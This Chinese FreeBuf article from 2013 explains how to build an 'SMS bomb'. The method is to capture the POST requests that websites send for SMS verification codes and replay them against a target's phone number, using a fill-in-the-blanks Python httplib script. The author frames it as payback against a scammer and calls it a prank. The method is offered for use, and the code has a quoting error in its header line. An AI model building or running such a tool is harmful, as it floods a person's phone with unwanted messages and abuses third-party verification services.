freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[视频]Python编写短信炸弹
2013-03-01 12:34:44

为何写这个?

帮朋友在圣诞节给骗子一个礼物!(因为朋友被骗...)

和一般的短信炸弹有何不同?

一般我们会挑无限次数的短信接收,可我没那么好的运气。然后自己把所有的合在了一起。测试中发现一般网站设置有一天最多五次、三次或者两次接收短信,还有的设置了N小时后恢复状态再允许。

下面简单说说步骤:

1.寻找能发手机短信验证的页面,确认手机能收到。(有些限制了地区接收)

2.选用任意一款抓包软件进行抓包(wireshark、fiddler、httpwatcher)

3.遇到POST的情况比较多,下面以POST请求为例

直接上代码吧,“#”行是需要大家自己修改的地方

#!/usr/bin/python

import httplib
params = " "    #body的内容
headers = {
     "User-Agent": Mozilla/5.0 "(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)",
     "Accept": "text/html, */*; q=0.01",
     "Accept-Language": "en-us",
     "Content-Type": "application/x-www-form-urlencoded",
     "Referer": " ",          #提交前的页面
     "Host": " "}          #
con = httplib.HTTPConnection("www.xxx.com")    #
con.request("POST", "/URI",params,headers)    #URI为提交后的页面,去掉前面的主机地址

response = con.getresponse()
if response.status == 200:        注:这里的返回代码并不能说明能成功接收短信
    print "Success","\n"
else:
    print "Failed","\n"
con.close()

此篇文章只是娱乐用恶作剧。请不要无限次尝试!

演示视频:

本文作者:, 转载请注明来自FreeBuf.COM

# 短信炸弹 # 短信攻击
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑